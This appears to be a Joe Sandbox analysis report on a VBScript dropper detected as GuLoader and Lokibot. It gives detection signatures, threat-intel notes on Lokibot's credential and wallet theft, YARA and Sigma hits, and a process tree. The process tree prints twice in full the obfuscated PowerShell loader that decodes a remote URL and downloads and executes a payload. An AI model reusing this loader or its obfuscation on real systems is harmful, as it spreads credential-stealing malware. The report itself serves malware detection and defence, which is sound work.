Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bnnebgers.vbs

Overview

General Information

Sample name:Bnnebgers.vbs
Analysis ID:1522525
MD5:5b6ded9dd4c8b33c96ec2dfccc4185ba
SHA1:baf00d33cc29a38cedd43d1b483a24e5af5ef707
SHA256:b39688815505416bd3ce779da8714b4eb492dea27036998ad90ddc439b8d554f
Tags:Lokivbsuser-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6404 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4348 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 416 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2713834484.0000000008BE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000003.00000002.2700448526.0000000005FEB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000003.00000002.2714081528.000000000BE9C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Process Memory Space: powershell.exe PID: 6648JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Click to see the 3 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_6648.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_4348.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc6c0:$b2: ::FromBase64String(
                • 0xb748:$s1: -join
                • 0x4ef4:$s4: +=
                • 0x4fb6:$s4: +=
                • 0x91dd:$s4: +=
                • 0xb2fa:$s4: +=
                • 0xb5e4:$s4: +=
                • 0xb72a:$s4: +=
                • 0x15ff4:$s4: +=
                • 0x16074:$s4: +=
                • 0x1613a:$s4: +=
                • 0x161ba:$s4: +=
                • 0x16390:$s4: +=
                • 0x16414:$s4: +=
                • 0xbf60:$e4: Get-WmiObject
                • 0xc14f:$e4: Get-Process
                • 0xc1a7:$e4: Start-Process
                • 0x16cfa:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", ProcessId: 6404, ProcessName: wscript.exe
                Sigma detected: Msiexec Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.206, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 416, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Bnnebgers.vbs", ProcessId: 6404, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort 